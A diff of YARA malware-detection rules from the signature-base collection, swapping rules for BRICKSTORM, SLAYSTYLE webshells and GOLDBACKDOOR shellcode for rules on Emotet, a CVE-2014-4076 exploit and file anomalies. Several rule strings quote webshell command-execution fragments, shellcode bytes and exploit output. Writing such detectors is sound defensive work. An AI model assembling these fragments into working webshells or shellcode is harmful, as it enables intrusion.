-		uint32( 0 ) == 0x464c457f and filesize < 10MB and ( 1 of ( $decr* ) and 1 of ( $str* ) or 5 of ( $str* ) )
+		filesize < 300KB and 1 of ( $x* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_MAL_G_APT_Backdoor_BRICKSTORM_1 : FILE
+rule SIGNATURE_BASE_CVE_2014_4076_Exploitcode : CVE_2014_4076 FILE
 {
 	meta:
-		description = "Detects BRICKSTORM backdoor used by APT group UNC5221 (China Nexus)"
-		author = "Google Threat Intelligence Group (GTIG) (modified by Florian Roth)"
-		id = "ecf69598-f0da-5234-940e-059de648ad74"
-		date = "2025-09-25"
-		modified = "2025-10-07"
-		reference = "https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_brickstorm_sep25.yar#L53-L78"
+		description = "Detects an exploit code for CVE-2014-4076"
+		author = "Florian Roth (Nextron Systems)"
+		id = "83563dea-63d9-58a9-82ed-275455122571"
+		date = "2018-04-04"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/yarGen"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2014_4076.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4645f2f6800bc654d5fa812237896b00"
-		logic_hash = "ffaeca48c96445044844779f28c46a5c6029ba96191d3faafbc8f3864c29e21b"
+		logic_hash = "96b8743de8b3968d64b74af93f5e61574a3b31d33df6d51e944b4f02c7b9723e"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = "CVE-2014-4076, FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "44690af85efef2db04c7e8cba7ca0d0e53be1a1432a339570a7d26eec860b8ee"
 
 	strings:
-		$ = "WRITE_LOGWednesday"
-		$ = "/home/vsphere-ui/"
-		$ = "WRITE_LOG=true"
-		$ = "dns rcode: %v"
-		$ = "/libs/doh.createDnsMessage"
-		$ = "/libs/func1.(*Client).BackgroundRun"
-		$ = "/libs/func1.CreateClient"
-		$ = "/core/extends/command.CommandNoContext"
-		$ = "/core/extends/command.ExecuteCmd"
-		$ = "/core/extends/command.RunShell"
-		$ = "/libs/fs.(*RemoteDriver).DeleteFile"
-		$ = "/libs/fs.(*RemoteDriver).GetFile"
-		$ = "/libs/fs.(*RemoteDriver).PutFile"
-		$ = "/libs/doh/doh.go"
+		$x1 = "[+] Created a new cmd.exe process" fullword ascii
+		$x2 = "[+] Modified shellcode" fullword ascii
+		$x3 = "[*] Spawning SYSTEM shell..." fullword ascii
+		$x4 = "[*] MS14-070 (CVE-2014-4076) x86" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x464c457f and 5 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_G_APT_Backdoor_BRICKSTORM_2 : FILE
+rule SIGNATURE_BASE_MAL_Emotet_JS_Dropper_Oct19_1 : FILE
 {
 	meta:
-		description = "Detects BRICKSTORM backdoor used by APT group UNC5221 (China Nexus)"
-		author = "Google Threat Intelligence Group (GTIG) (modified by Florian Roth)"
-		id = "d11ae2e1-4197-5545-a431-eec8514e58e8"
-		date = "2025-09-25"
-		modified = "2025-10-07"
-		reference = "https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_brickstorm_sep25.yar#L80-L92"
+		description = "Detects Emotet JS dropper"
+		author = "Florian Roth (Nextron Systems)"
+		id = "34605452-8f3d-540a-b66f-4f68d9187003"
+		date = "2019-10-03"
+		modified = "2023-12-05"
+		reference = "https://app.any.run/tasks/aaa75105-dc85-48ca-9732-085b2ceeb6eb/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_emotet.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "db989caa2a80481e58e6d65068e1814cf7366e3bdfc347e9019fb2bc980c74fa"
+		logic_hash = "563077f3bc8ee18a887eecb9f0591c693e5543a9875eebad2186745154af1ade"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		hash1 = "38295d728522426672b9497f63b72066e811f5b53a14fb4c4ffc23d4efbbca4a"
+		hash2 = "9bc004a53816a5b46bfb08e819ac1cf32c3bdc556a87a58cbada416c10423573"
 
 	strings:
-		$str1 = { 0F 57 C0 0F 11 84 ?? ?? ?? ?? ?? C6 44 ?? ?? 00 4? C7 84 ?? ?? ?? ?? ?? 00 00 00 00 0F 57 C0 0F 11 84 ?? ?? ?? ?? ?? 0F 11 84 ?? ?? ?? ?? ?? 4? 8B 84 ?? ?? ?? ?? ?? 4? 89 04 ?? 4? 8B 8C ?? ?? ?? ?? ?? 4? 89 4C ?? ?? E8 ?? ?? ?? ?? 4? 83 7C ?? ?? 00 0F 84 ?? ?? ?? ?? 4? 8D 05 ?? ?? ?? ?? 4? 89 ?? ?? E8 ?? ?? ?? ?? 4? 8B 7C ?? ?? 4? 8B 84 ?? ?? ?? ?? ?? 4? 89 47 08 83 3D ?? ?? ?? ?? 00 75 ?? 4? 8B 84 ?? ?? ?? ?? ?? 4? 89 07 4? 89 BC ?? ?? ?? ?? ?? 4? C7 84 ?? ?? ?? ?? ?? 01 00 00 00 4? C7 84 ?? ?? ?? ?? ?? 01 00 00 00 0F 57 C0 0F 11 84 ?? ?? ?? ?? ?? 4? 8B ?? ?? ?? ?? ?? ?? 4? 81 C4 ?? ?? ?? ?? C3 }
-		$str2 = { 4? C7 84 ?? ?? ?? ?? ?? 00 00 00 00 4? C7 84 ?? ?? ?? ?? ?? 00 00 00 00 4? C7 84 ?? ?? ?? ?? ?? 00 00 00 00 4? C7 84 ?? ?? ?? ?? ?? 00 00 00 00 4? C7 84 ?? ?? ?? ?? ?? 00 00 00 00 4? 8B 84 ?? ?? ?? ?? ?? 4? 89 04 ?? 4? 8B 8C ?? ?? ?? ?? ?? 4? 89 4C ?? ?? E8 ?? ?? ?? ?? 4? 8B 44 ?? ?? 4? 85 C0 0F 84 ?? ?? ?? ?? 4? 8D 05 ?? ?? ?? ?? 4? 89 ?? ?? E8 ?? ?? ?? ?? 4? 8B 44 ?? ?? 4? 8B 8C ?? ?? ?? ?? ?? 4? 89 48 08 8B 0D ?? ?? ?? ?? 85 C9 75 ?? 4? 8B 8C ?? ?? ?? ?? ?? 4? 89 08 84 00 4? 89 84 ?? ?? ?? ?? ?? 4? C7 84 ?? ?? ?? ?? ?? 01 00 00 00 4? C7 84 ?? ?? ?? ?? ?? 01 00 00 00 4? C7 84 ?? ?? ?? ?? ?? 00 00 00 00 4? C7 84 ?? ?? ?? ?? ?? 00 00 00 00 90 E8 ?? ?? ?? ?? 4? 8B ?? ?4 D8 00 00 00 4? 81 C4 E0 00 00 00 C3 }
+		$xc1 = { FF FE 76 00 61 00 72 00 20 00 61 00 3D 00 5B 00
+               27 00 }
 
 	condition:
-		uint32be( 0 ) == 0x7F454C46 and any of them
+		uint32( 0 ) == 0x0076feff and filesize <= 700KB and $xc1 at 0
 }
-rule SIGNATURE_BASE_WEBSHELL_G_APT_Backdoorwebshell_SLAYSTYLE_1 : FILE
-{
-	meta:
-		description = "Detects webshell used by APT group UNC5221 (China Nexus)"
-		author = "Google Threat Intelligence Group (GTIG) (modified by Florian Roth)"
-		id = "a5107e4e-3618-5d08-b187-342d5cb1b12f"
-		date = "2025-09-25"
-		modified = "2025-10-07"
-		reference = "https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_brickstorm_sep25.yar#L94-L112"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7a56238218e60a69049f5d9c756df4fb6f0de772fbc437a14c5db7192f971be6"
-		score = 75
-		quality = 83
-		tags = "FILE"
-
-	strings:
-		$str1_alt = "=request.getParameter(\""
-		$str2 = "=new String(java.util.Base64.getDecoder().decode(" ascii wide nocase
-		$str21_alt = "={\"/bin/sh\",\"-c\"," ascii
-		$str3 = "= Runtime.getRuntime().exec(" ascii
-		$str4 = "java.io.InputStream" ascii
-		$str5 = "java.util.Base64.getEncoder().encodeToString(org.apache.commons.io.IOUtils.toByteArray(" ascii
 
-	condition:
-		filesize < 5MB and all of them
-}
-rule SIGNATURE_BASE_WEBSHELL_G_APT_Backdoorwebshell_SLAYSTYLE_2 : FILE
+rule SIGNATURE_BASE_MAL_Emotet_Jan20_1 : FILE
 {
 	meta:
-		description = "Detects webshell used by APT group UNC5221 (China Nexus)"
-		author = "Google Threat Intelligence Group (GTIG) (modified by Florian Roth)"
-		id = "a7c3e453-c071-5863-887a-6eca6d74d2fe"
-		date = "2025-09-25"
-		modified = "2025-10-07"
-		reference = "https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_brickstorm_sep25.yar#L114-L129"
+		description = "Detects Emotet malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "334ae7e5-0a46-5e95-bf53-0f343db4e4de"
+		date = "2020-01-29"
+		modified = "2023-12-05"
+		reference = "https://app.any.run/tasks/5e81638e-df2e-4a5b-9e45-b07c38d53929/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_emotet.yar#L20-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d2d1003f77a2066b48df1c27feab79c0a1951ebb62c3198de8366bcfee42e30a"
+		logic_hash = "23ffcdde3eae7637e5b47a0f940cbebafccfd4c3f222b882e73d7d02447b83c3"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		hash1 = "e7c22ccdb1103ee6bd15c528270f56913bb2f47345b360802b74084563f1b73d"
 
 	strings:
-		$str1 = "request.getParameter"
-		$str2 = "/bin/sh"
-		$str3 = "java.io.InputStream"
-		$str4 = "Runtime.getRuntime().exec("
-		$str5 = "2>&1"
+		$op0 = { 74 60 8d 34 18 eb 54 03 c3 50 ff 15 18 08 41 00 }
+		$op1 = { 03 fe 66 39 07 0f 85 2a ff ff ff 8b 4d f0 6a 20 }
+		$op2 = { 8b 7d fc 0f 85 49 ff ff ff 85 db 0f 84 d1 }
 
 	condition:
-		( uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464C457F ) and filesize < 7KB and all of them and @str4 > @str2
+		uint16( 0 ) == 0x5a4d and filesize <= 200KB and ( pe.imphash ( ) == "009889c73bd2e55113bf6dfa5f395e0d" or 1 of them )
 }
-rule SIGNATURE_BASE_MAL_G_Backdoor_BRICKSTEAL_1 : FILE
+rule SIGNATURE_BASE_MAL_Emotet_BKA_Quarantine_Apr21
 {
 	meta:
-		description = "Detects backdoor BRICKSTEAL used by APT group UNC5221 (China Nexus)"
-		author = "Google Threat Intelligence Group (GTIG) (modified by Florian Roth)"
-		id = "03635d14-35b4-59a4-98ca-e552888d67ed"
-		date = "2025-09-25"
-		modified = "2025-10-07"
-		reference = "https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_brickstorm_sep25.yar#L131-L146"
+		description = "No description has been set in the source file - Signature Base"
+		author = "press inquiries <info@bka.de>, technical contact <info@mha.bka.de>"
+		id = "22c27d82-00cb-5d2f-a1cc-9f8b4c60aecd"
+		date = "2021-03-23"
+		modified = "2023-12-05"
+		reference = "https://www.bka.de/DE/IhreSicherheit/RichtigesVerhalten/StraftatenImInternet/FAQ/FAQ_node.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_emotet.yar#L39-L52"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "27413b63eae84d95cf0ca920e9ac1daba200281ecc32cc9922c0e7850c7f0571"
+		logic_hash = "cc75be5f641e21446a41bf9cc855330a612847e7e3a3be935577d33195f40d05"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		descripton = "The modified emotet binary replaces the original emotet on the system of the victim. The original emotet is copied to a quarantine for evidence-preservation."
+		note = "The quarantine folder depends on the scope of the initial emotet infection (user or administrator). It is the temporary folder as returned by GetTempPathW under a filename starting with UDP as returned by GetTempFileNameW. To prevent accidental reinfection by a user, the quarantined emotet is encrypted using RC4 and a 0x20 bytes long key found at the start of the quarantined file (see $key)."
+		sharing = "TLP:WHITE"
 
 	strings:
-		$str1 = "comvmware"
-		$str2 = "abcdABCD1234!@#$"
-		$str3 = "ads.png"
-		$str4 = "User-Agent"
-		$str5 = "com/vmware/"
+		$key = { c3 da da 19 63 45 2c 86 77 3b e9 fd 24 64 fb b8 07 fe 12 d0 2a 48 13 38 48 68 e8 ae 91 3c ed 82 }
 
 	condition:
-		all of them and filesize < 10KB
+		$key at 0
 }
-rule SIGNATURE_BASE_MAL_G_Dropper_BRICKSTEAL_1
+rule SIGNATURE_BASE_MAL_Emotet_BKA_Cleanup_Apr21 : FILE
 {
 	meta:
-		description = "Detects backdoor BRICKSTEAL dropper used by APT group UNC5221 (China Nexus)"
-		author = "Google Threat Intelligence Group (GTIG) (modified by Florian Roth)"
-		id = "73775e1a-6eaf-5ac5-bede-a9863449b6c5"
-		date = "2025-09-25"
-		modified = "2025-10-07"
-		reference = "https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_brickstorm_sep25.yar#L148-L165"
+		description = "No description has been set in the source file - Signature Base"
+		author = "press inquiries <info@bka.de>, technical contact <info@mha.bka.de>"
+		id = "10d93918-8a5e-54a3-81c6-f6ff68562e13"
+		date = "2021-03-23"
+		modified = "2023-12-05"
+		reference = "https://www.bka.de/DE/IhreSicherheit/RichtigesVerhalten/StraftatenImInternet/FAQ/FAQ_node.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_emotet.yar#L54-L70"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5ed68f17ba8ac0c7ba02f9111f083244181332c71ed43b4cd5582baee493c98d"
+		logic_hash = "533adaed96d015ea2dcd54d5aaf9e71b5b70430ed5733a98618925cf978a6515"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		descripton = "This rule targets a modified emotet binary deployed by the Bundeskriminalamt on the 26th of January 2021."
+		note = "The binary will replace the original emotet by copying it to a quarantine. It also contains a routine to perform a self-deinstallation on the 25th of April 2021. The three-month timeframe between rollout and self-deinstallation was chosen primarily for evidence purposes as well as to allow remediation."
+		sharing = "TLP:WHITE"
 
 	strings:
-		$str1 = "Base64.getDecoder().decode"
-		$str2 = "Thread.currentThread().getContextClassLoader()"
-		$str3 = ".class.getDeclaredMethod"
-		$str4 = "byte[].class"
-		$str5 = "method.invoke"
-		$str6 = "filterClass.newInstance()"
-		$str7 = "/websso/SAML2/SSO/*"
+		$key = { c3 da da 19 63 45 2c 86 77 3b e9 fd 24 64 fb b8 07 fe 12 d0 2a 48 13 38 48 68 e8 ae 91 3c ed 82 }
 
 	condition:
-		all of them
+		filesize > 300KB and filesize < 700KB and uint16( 0 ) == 0x5A4D and $key
 }
-rule SIGNATURE_BASE_MAL_G_Dropper_BRICKSTEAL_2
+rule SIGNATURE_BASE_Ce_Enfal_Cmstar_Debug_Msg : FILE
 {
 	meta:
-		description = "Detects backdoor BRICKSTEAL dropper used by APT group UNC5221 (China Nexus)"
-		author = "Google Threat Intelligence Group (GTIG) (modified by Florian Roth)"
-		id = "3428d706-9844-5505-9690-1f4c3e805350"
-		date = "2025-09-25"
-		modified = "2025-10-07"
-		reference = "https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_brickstorm_sep25.yar#L167-L184"
+		description = "Detects the static debug strings within CMSTAR"
+		author = "rfalcone"
+		id = "2c483f20-4fa8-5246-9dcb-8868db64b6e3"
+		date = "2015-05-10"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/JucrP9"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cmstar.yar#L2-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e1bdcc59259b2bf476b873a9f94b9296efc7720d83fba04f6569217019ae3af8"
+		hash = "9b9cc7e2a2481b0472721e6b87f1eba4faf2d419d1e2c115a91ab7e7e6fc7f7c"
+		logic_hash = "31251b7ce33eb561aeb7405514df83dc1e00fdf184e3deeaa48505407d9567a0"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$str1_alt = "(Class<?>) method.invoke(" ascii wide
-		$str2 = "(\"yv66vg" ascii wide
-		$str3 = "request.getSession().getServletContext" ascii wide
-		$str4 = ".getClass().getDeclaredField(" ascii wide
-		$str5 = "new FilterDef();" ascii wide
-		$str6 = "new FilterMap();" ascii wide
+		$d1 = "EEE\x0d\x0a" fullword
+		$d2 = "TKE\x0d\x0a" fullword
+		$d3 = "VPE\x0d\x0a" fullword
+		$d4 = "VPS\x0d\x0a" fullword
+		$d5 = "WFSE\x0d\x0a" fullword
+		$d6 = "WFSS\x0d\x0a" fullword
+		$d7 = "CM**\x0d\x0a" fullword
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and all of ( $d* )
 }
-rule SIGNATURE_BASE_EXT_NK_GOLDBACKDOOR_Inital_Shellcode
+rule SIGNATURE_BASE_SUSP_TINY_PE : FILE
 {
 	meta:
-		description = "Detection for initial shellcode loader used to deploy GOLDBACDOOR"
-		author = "Silas Cutler (silas@Stairwell.com)"
-		id = "daab8e54-11b3-51cc-8bee-55b078f3e791"
-		date = "2022-04-21"
+		description = "Detects Tiny PE file"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5081c24e-91d1-5705-9459-f675be4f0e3c"
+		date = "2019-10-23"
 		modified = "2023-12-05"
-		reference = "https://stairwell.com/wp-content/uploads/2022/04/Stairwell-threat-report-The-ink-stained-trail-of-GOLDBACKDOOR.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_goldbackdoor.yar#L2-L20"
+		reference = "https://webserver2.tecgraf.puc-rio.br/~ismael/Cursos/YC++/apostilas/win32_xcoff_pe/tyne-example/Tiny%20PE.htm"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_file_anomalies.yar#L3-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4df97181037a580098dbe34d3b6ceab5c7b83932f1831c36ee99876a8f1524f9"
+		logic_hash = "5eabfa8e0fd4d6d1376d263484fba985e7a4b05d68046be1f79c1dfdbbfff9e5"
 		score = 80
 		quality = 85
-		tags = ""
-		version = "0.1"
+		tags = "FILE"
 
 	strings:
-		$ = { C7 45 C4 25 6C 6F 63 50 8D 45 C4 C7 45 C8 61 6C 61 70 8B F9 C7 45
-              CC 70 64 61 74 50 B9 BD 88 17 75 C7 45 D0 61 25 5C 6C 8B DA C7 45 D4 6F
-              67 5F 67 C7 45 D8 6F 6C 64 2E C7 45 DC 74 78 74 00 }
-		$ = { 51 50 57 56 B9 E6 8E 85 35 E8 ?? ?? ?? ?? FF D0 }
-		$ = { 6A 40 68 00 10 00 00 52 6A 00 FF 75 E0 B9 E3 18 90 72 E8 ?? ?? ?? ?? FF D0}
+		$header = { 4D 5A 00 00 50 45 00 00 }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and uint16( 4 ) == 0x4550 and filesize <= 20KB and $header at 0
 }
-rule SIGNATURE_BASE_EXT_NK_GOLDBACKDOOR_Injected_Shellcode
+rule SIGNATURE_BASE_SUSP_GIF_Anomalies : FILE
 {
 	meta:
-		description = "Detection for injected shellcode that decodes GOLDBACKDOOR"
-		author = "Silas Cutler (silas@Stairwell.com)"
-		id = "aa921f01-98cc-51ab-877a-e7beede77e36"
-		date = "2022-04-21"
+		description = "Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2e77c2ff-a8f6-5444-a93d-843312640a28"
+		date = "2020-07-02"
 		modified = "2023-12-05"
-		reference = "https://stairwell.com/wp-content/uploads/2022/04/Stairwell-threat-report-The-ink-stained-trail-of-GOLDBACKDOOR.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_goldbackdoor.yar#L22-L42"
+		reference = "https://en.wikipedia.org/wiki/GIF"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_file_anomalies.yar#L17-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b45f408c0f342591e66ef0dfcfc1c09f8558c5e8f4bd7f824b30f00d531c7511"
-		score = 80
+		logic_hash = "64d17c8de72600cd889a802fd002faaaf9a3a17f7fa157ae5b2b620b28e6c439"
+		score = 60
 		quality = 85
-		tags = ""
-		version = "0.1"
-
-	strings:
-		$dec_routine = { 8A 19 57 8B FA 8B 51 01 83 C1 05 85 D2 74 0E 56 8B C1 8B F2 30 18 40 83 EE 01 75 F8 5E 57 }
-		$rtlfillmemory_load = { B9 4B 17 CD 5B 55 56 33 ED 55 6A 10 50 E8 86 00 00 00 FF D0 }
-		$ = "StartModule"
-		$log_file_name = { C7 44 24 3C 25 6C 6F 63 50 8D 44 24 40 C7 44 24 44 61 6C
-                           61 70 50 B9 BD 88 17 75 C7 44 24 4C 70 64 61 74 C7 44 24
-                           50 61 25 5C 6C C7 44 24 54 6F 67 5F 67 C7 44 24 58 6F 6C
-                           64 32 C7 44 24 5C 2E 74 78 74 }
-		$ = { B9 8E 8A DD 8D 8B F0 E8 E9 FB FF FF FF D0 }
+		tags = "FILE"
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x4947 and uint8( 2 ) == 0x46 and uint8( 11 ) != 0x00 and uint8( 12 ) != 0x00 and uint8( filesize -1 ) != 0x3b
 }
-rule SIGNATURE_BASE_EXT_NK_GOLDBACKDOOR_Generic_Shellcode
+
+rule SIGNATURE_BASE_SUSP_Hxd_Icon_Anomaly_May23_1 : FILE
 {
 	meta:
-		description = "Generic detection for shellcode used to drop GOLDBACKDOOR"
-		author = "Silas Cutler (silas@Stairwell.com)"
-		id = "70081d63-0b26-5358-8444-5adc3a44aaa0"
-		date = "2022-04-21"
+		description = "Detects suspicious use of the the free hex editor HxD's icon in PE files that don't seem to be a legitimate version of HxD"
+		author = "Florian Roth"
+		id = "3ac8cc92-6d76-5787-ada0-cfb6eabb4b20"
+		date = "2023-05-29"
 		modified = "2023-12-05"
-		reference = "https://stairwell.com/wp-content/uploads/2022/04/Stairwell-threat-report-The-ink-stained-trail-of-GOLDBACKDOOR.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_goldbackdoor.yar#L44-L58"
+		reference = "https://www.linkedin.com/feed/update/urn:li:activity:7068631930040188929/?utm_source=share&utm_medium=member_ios"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_file_anomalies.yar#L32-L84"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e046a70b1dee020ba73d960a9d91daaccd0b5c262965c8647f608c5c83a28257"
-		score = 75
+		logic_hash = "a328687ac8b868fb78a49188b286a8951c6043a7ff6ff0c7a23c3f9b3ef15eb2"
+		score = 65
 		quality = 85
-		tags = ""
-		version = "0.1"
+		tags = "FILE"
 
 	strings:
-		$ = { B9 8E 8A DD 8D 8B F0 E8 ?? ?? ?? ?? FF D0 }
-		$ = { B9 8E AB 6F 40 [1-10] 50 [1-10] E8 ?? ?? ?? ?? FF D0 }
+		$ac1 = { 99 00 77 0D DD 09 99 80 99 00 77 0D DD 09 99 80
+               99 00 77 0D DD 09 99 80 99 00 77 0D DD 09 99 80
+               99 00 77 0D DD 09 99 80 99 00 77 0D DD 09 99 80
+               99 00 77 0D DD 09 99 80 99 00 77 0D DD 09 99 80
+               99 00 77 0D DD 09 99 80 99 00 77 0D D0 99 98 09
+               99 99 00 0D D0 99 98 09 99 99 00 0D D0 99 98 09
+               99 99 00 0D D0 99 98 0F F9 99 00 0D D0 99 98 09
+               9F 99 00 0D D0 99 98 09 FF 99 00 0D D0 99 98 09
+               FF 99 00 0D D0 99 98 09 99 99 00 0D D0 99 98 0F
+               F9 99 00 0D D0 99 98 09 99 99 00 0D 09 99 80 9F
+               F9 99 99 00 09 99 80 99 F9 99 99 00 09 99 80 FF }
+		$ac2 = { FF FF FF FF FF FF FF FF FF FF FF FF FF FF B9 DE
+               FA 68 B8 F4 39 A2 F1 39 A2 F1 39 A2 F1 39 A2 F1
+               39 A2 F1 39 A2 F1 68 B8 F4 B9 DE FA FF FF FF FF
+               FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF }
+		$s1 = { 00 4D 00 61 00 EB 00 6C 00 20 00 48 00 F6 00 72 00 7A }
+		$s2 = "mh-nexus.de" ascii wide
+		$upx1 = "UPX0" ascii fullword
+		$xs1 = "terminator" ascii wide fullword
+		$xs2 = "Terminator" ascii wide fullword
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and 1 of ( $ac* ) and ( not 1 of ( $s* ) or filesize > 6930000 or ( pe.is_32bit ( ) and filesize < 1540000 and not $upx1 ) or ( pe.is_32bit ( ) and filesize < 590000 and $upx1 ) or ( pe.is_64bit ( ) and filesize < 6670000 and not $upx1 ) or ( pe.is_64bit ( ) and filesize < 1300000 and $upx1 ) or 1 of ( $xs* ) )
 }
-rule SIGNATURE_BASE_VUL_Exchange_CVE_2020_0688 : FILE
+rule SIGNATURE_BASE_Powershell_Suite_Hacktools_Gen_Strings : FILE
 {
 	meta:
-		description = "Detects static validation key used by Exchange server in web.config"
+		description = "Detects strings from scripts in the PowerShell-Suite repo"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1065f297-0dc4-5dcb-b0f3-c89d06ff5e69"
-		date = "2020-02-26"
+		id = "afccdd99-da83-5fde-9e21-52220ded1e47"
+		date = "2017-12-27"
 		modified = "2023-12-05"
-		reference = "https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vul_cve_2020_0688.yar#L2-L15"
+		reference = "https://github.com/FuzzySecurity/PowerShell-Suite"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_suite.yar#L2-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "035971028d36c8bbcc6a274817187adfbfefe530ff6808af5a7c0b4667c1bd8b"
-		score = 60
-		quality = 85
+		logic_hash = "0f14a0665c60e85c0cf508f46130b09e467a16270fcd1aa8d0319e17778d4d75"
+		score = 75
+		quality = 83
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "79071ba5a984ee05903d566130467483c197cbc2537f25c1e3d7ae4772211fe0"
+		hash2 = "db31367410d0a9ffc9ed37f423a4b082639591be7f46aca91f5be261b23212d5"
+		hash3 = "4f51e7676a4d54c1962760ca0ac81beb28008451511af96652c31f4f40e8eb8e"
+		hash4 = "17ac9bb0c46838c65303f42a4a346fcba838ebd5833b875e81dd65c82701d8a8"
+		hash5 = "fa33aef619e620a88ecccb990e71c1e11ce2445f799979d23be2d1ad4321b6c6"
+		hash6 = "5542bd89005819bc4eef8dfc8a158183e5fd7a1438c84da35102588f5813a225"
+		hash7 = "c6a99faeba098eb411f0a9fcb772abac2af438fc155131ebfc93a00e3dcfad50"
+		hash8 = "a8e06ecf5a8c25619ce85f8a23f2416832cabb5592547609cfea8bd7fcfcc93d"
+		hash9 = "6aa5abf58904d347d441ac8852bd64b2bad3b5b03b518bdd06510931a6564d08"
+		hash10 = "5608f25930f99d78804be8c9c39bd33f4f8d14360dd1e4cc88139aa34c27376d"
+		hash11 = "68b6c0b5479ecede3050a2f44f8bb8783a22beeef4a258c4ff00974f5909b714"
